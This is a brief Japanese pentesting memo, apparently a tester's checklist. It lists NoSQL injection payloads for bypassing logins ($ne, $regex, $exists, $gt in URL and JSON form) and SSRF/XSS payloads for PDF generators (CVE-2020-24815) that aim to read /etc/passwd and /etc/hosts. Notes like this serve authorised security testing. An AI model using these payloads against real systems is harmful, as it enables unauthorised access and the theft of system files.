認証のバイパスは、SQLInjectionだけではなく、NoSQLからも可能。
https://book.hacktricks.xyz/pentesting-web/nosql-injection
#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
このあたりは要注意。
ウェブサービスでPDFが生成される時は以下の脆弱性を確認すること。
MicroStrategy SSRF through PDF Generator (CVE-2020-24815)
https://www.triskelelabs.com/blog/extracting-your-aws-access-keys-through-a-pdf-file
BurpでXSSが可能かどうか確認し、SSRF攻撃を実施。/etc/passwd や /etc/hostsが取れる可能性あり。
<script> document.write(document.location.href); </script>
や
<iframe src=/etc/passwd></iframe>
<iframe src=/etc/passwd height=1000 width=1000></iframe>
を試そう。